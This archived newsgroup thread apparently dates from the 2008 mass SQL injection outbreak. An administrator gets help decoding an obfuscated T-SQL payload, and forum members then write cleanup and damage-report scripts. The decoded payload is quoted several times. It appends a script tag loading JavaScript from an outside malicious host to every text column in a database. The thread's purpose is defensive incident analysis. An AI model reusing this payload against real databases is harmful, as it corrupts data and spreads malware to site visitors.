Urgent: Deciphering binary code executed against the database

**eisaacs@gmail.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

Maybe you could SELECT the text of the T-SQL and check the execution
plan to possibly get some hint of what it's doing?

Please let us know what you find. That's pretty odd.

**Matthias Klaey** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

anojjona@aol.co m wrote:

Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it's in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it's asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
Thanks!
>
Here's the code:
>
DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x44004

[...]

EXEC(@S);

Hi

Copy the code into a query window for a test datadase, then insted of
the EXEC(@S) just simply do a

SELECT @S

and look at the result. Here is what I got:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_S TATUS=0)
BEGIN
exec('update ['+@T+']
set ['+@C+']=rtrim(convert( varchar,['+@C+']))+''
<script src=http://www.killwow1.cn/g.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

I'm not good enough to understand what this really does, and a lot
will depend on what is coming down the line from the web site.

But I think you got yourself something nasty, and I would ASAP kill
this DB and restore from a clean backup.

HTH
Matthias Kläy
--

Hosting und Webhosting - Ihre Webseite & Domain

https://www.kcc.ch

Internet, Telefonie, TV, Webhosting, Cloud, E-Mail, Backup & Business Connectivity

**eisaacs@gmail.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

It looks like they've added <script src=http://www.killwow1.cn/g.js></
scriptto each column in each user defined table.

Your server has obviously been compromised. If your data is
sensitive, take it offline right away until you figure out how they
got in. If you have a website that uses this db, take it down right
away. They're obviously propagating some js onto your website by
adding it in to all your data in a way that is not intended to not
show as visible text on the web itself.

**anojjona@aol.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

Great, that's wonderful...Tha nks! So this will be easier than I
thought. What that code does is loop through the tables in the
database and try to insert that nasty URL into each table. (Don't
click on that link, by the way.)

So basically, with each one of these things where they did that, I can
just use that select statement and find out what they did.
Awesome...Thank s!

Matthias Klaey wrote:

anojjona@aol.co m wrote:
>

Hi,
I need to figure out what some code that was maliciously executed
against a database does. However, it's in a very strange format. It
simply declares a variable and sets it equal to a huge binary thing
(seems to be some sort of compiled code) cast as nvarchar. It then
executes this variable.
Is there any way to decipher or decompile this code? Does anyone
have information either on what SQL Server does when it's asked to
execute a binary string (as opposed to regular T-SQL) and any tools
that can be used to disassemble or understand this code?
Thanks!

Here's the code:

DECLARE @S NVARCHAR(4000);
SET
@S=CAST(0x44004

>
[...]
>

EXEC(@S);

>
Hi
>
Copy the code into a query window for a test datadase, then insted of
the EXEC(@S) just simply do a
>
SELECT @S
>
and look at the result. Here is what I got:
>
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)
>
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_S TATUS=0)
BEGIN
exec('update ['+@T+']
set ['+@C+']=rtrim(convert( varchar,['+@C+']))+''
<script src=http://www.killwow1.cn/g.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
>
I'm not good enough to understand what this really does, and a lot
will depend on what is coming down the line from the web site.
>
But I think you got yourself something nasty, and I would ASAP kill
this DB and restore from a clean backup.
>
HTH
Matthias Klï¿½y
--
www.kcc.ch

**anojjona@aol.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

Yes....we've taken it offline and have an idea how they got in. I've
heard in the news that thousands of websites were hit by this. But I
need to understand the extent of the damage. So that's why I'm going
through each of the log entries.

eisa...@gmail.c om wrote:

It looks like they've added <script src=http://www.killwow1.cn/g.js></
scriptto each column in each user defined table.
>
Your server has obviously been compromised. If your data is
sensitive, take it offline right away until you figure out how they
got in. If you have a website that uses this db, take it down right
away. They're obviously propagating some js onto your website by
adding it in to all your data in a way that is not intended to not
show as visible text on the web itself.

**eisaacs@gmail.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

You might want to do the same loop this guy used to fix the data by
doing a REPLACE() to replace all instances of that <scriptlink with
and empty string ''.

DECLARE @BAD = '<script src=http://www.killwow1.cn/g.js></script>' --
DONT GO HERE OR CLICK THIS LINK

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_S TATUS=0)
BEGIN
exec('update ['+@T+']
set ['+@C+']= REPLACE('+@C+', ''' + @BAD + ''', '''')'
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

....I think that's right, but I didn't test it or compile it. That
should remove the bad data.

**eisaacs@gmail.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

Yes I didn't test it...

DECLARE @BAD = '<script src=http://www.killwow1.cn/g.js></script>'

should be...

DECLARE @BAD = VARCHAR(200)
SET @BAD = '<script src=http://www.killwow1.cn/g.js></script>' --

....Again...don 't click that link.

**Matthias Klaey** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

anojjona@aol.co m wrote:

Great, that's wonderful...Tha nks! So this will be easier than I
thought. What that code does is loop through the tables in the
database and try to insert that nasty URL into each table. (Don't
click on that link, by the way.)
>
So basically, with each one of these things where they did that, I can
just use that select statement and find out what they did.
Awesome...Thank s!
>

I'm glad I could help. Is it possible to tell us how you got cought
with this piece of sh...?

Greetings, Matthias
--

Hosting und Webhosting - Ihre Webseite & Domain

https://www.kcc.ch

Internet, Telefonie, TV, Webhosting, Cloud, E-Mail, Backup & Business Connectivity

**Eric** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

Based on what I've been hearing about in the news, I'm guessing it was
a SQL Injection attack. But I too would like to know.

**anojjona@aol.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

On May 12, 9:25 pm, Eric <eisa...@gmail. comwrote:

Based on what I've been hearing about in the news, I'm guessing it was
a SQL Injection attack. But I too would like to know.

Yeah, it seems this may be the attack that everybody's been talking
about it. It just repeats that same code on every vulnerable page.
The odd thing is, it seems that it doesn't run the code against all
pages that accept inputs...just against a few pages that are
vulnerable. That might suggest that websites were attacked long
before without it being caught.

**Pumba** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

On 13 Mai, 03:25, Eric <eisa...@gmail. comwrote:

Based on what I've been hearing about in the news, I'm guessing it was
a SQL Injection attack. But I too would like to know.

Where did you read about this?

Tor

**anojjona@aol.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

On May 13, 4:58 am, Pumba <takvi...@gmail .comwrote:

On 13 Mai, 03:25, Eric <eisa...@gmail. comwrote:
>

Based on what I've been hearing about in the news, I'm guessing it was
a SQL Injection attack. But I too would like to know.

>
Where did you read about this?
>
Tor

SANS.edu Internet Storm Center - SANS Internet Storm Center

http://isc.sans.org/diary.html?storyid=4331

SANS.edu Internet Storm Center. Today's Top Story: Lumma Stealer infection with Sectop RAT (ArechClient2);

That went to a different website, but with the same script to insert
it. Also:

Access Denied

http://www.us-cert.gov/current/index.html#compromised_websites_hosting_malicious_javascript

Because this attack is so widespread, us-cert.gov is recommending
people disable JavaScript on their browser completely, and follow
these steps:

Access Denied

http://www.us-cert.gov/reading_room/securing_browser/

Some articles claim that disabling JavaScript is not enough...that
some variants of the attack can exploit holes in HTML without even
JavaScript. That sounds a bit far-out to me, but that's what some
experts are saying.

**Eric** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

Here's the news link I found...back from April 23...

http://www.pcpro.co.uk/news/192051/hackers-infect-half-a-million-websites.html

This seems to describe what happened.

**anojjona@aol.com** · Jun 27 '08, 07:05 PM

Re: Urgent: Deciphering binary code executed against the database

On May 13, 2:18 pm, Eric <eisa...@gmail. comwrote:

Here's the news link I found...back from April 23...
>
http://www.pcpro.co.uk/news/192051/h...a-million-webs...
>
This seems to describe what happened.

Yeah...a lot of sites are affected. And what I've heard is happening
is that when someone hits an infected web page, trojans get installed
on that person's computer, which may not only steal user passwords,
but also send out more attacks using that person's computer. The
places this thing points to are constantly changing.

Now another thing, for those who are interested...th e idea posted
before that one could use the same logic to reverse the damage
apparently won't work. That's because it uses the convert() command
to convert the data to varchar. That does two things: It allows the
script to work on text fields (somehow varchar fails when used in
dynamic SQL within an exec statement); but also, since there is no
field length specified, SQL Server seems to default to 30. So, the
data gets cut off after 30 characters (plus any spaces are trimmed
with the rtrim), and then the malicious code is inserted after that.

Every day or two, more attacks come, perhaps from infected computers,
until the site is stopped or SQL injection holes patched. When that
happens, the old malicious code is replaced with the new (because of
the truncation at 30 characters). But each of these seems to end with
the end-script tag. However, since sometimes the Javascript is there
only to use document.write( ) to put in an iframe, it's possible that
some of these exploits may just insert iframes instead of JavaScript.

(Iframes to websites that have ActiveX controls is perhaps one of the
exploits they were talking about when they said disabling JavaScript
isn't enough?)

By the way, does anyone know if the 30 character thing is standard, or
if it's configurable per installation?

Anyhow, given the data loss, restoring from backup seems to be the
only way.

Here's a little script I wrote to at least get a record of the
damage.

--Do the create table once in the session:
--Create table #report(Tablena me varchar(255), columnname
varchar(255), datatype int, affectedrows int)

DECLARE @BAD varchar(10)
DECLARE @T varchar(255),@C varchar(255),@D int

Set @BAD = '</script>'
DECLARE Table_Cursor1 CURSOR FOR select a.name,b.name,b .xtype
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

delete from #report

OPEN Table_Cursor1
FETCH NEXT FROM Table_Cursor1 INTO @T,@C,@D
WHILE(@@FETCH_S TATUS=0)
BEGIN
exec('Declare @x int;
SELECT @x = COUNT(1)
FROM ['+@T+']
WHERE RIGHT(convert(v archar(4000),['+@C+']),9) = '''+@BAD+''';
if @x 0 begin
INSERT INTO #report select '''+@T+''', '''+@C+''', '''+@D+''',
COUNT(1)
FROM ['+@T+']
WHERE RIGHT(convert(v archar(4000),['+@C+']),9) = '''+@BAD+'''
end;')

FETCH NEXT FROM Table_Cursor1 INTO @T,@C,@D
END CLOSE Table_Cursor1
DEALLOCATE Table_Cursor1

select * from #report

Urgent: Deciphering binary code executed against the database

Urgent: Deciphering binary code executed against the database

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment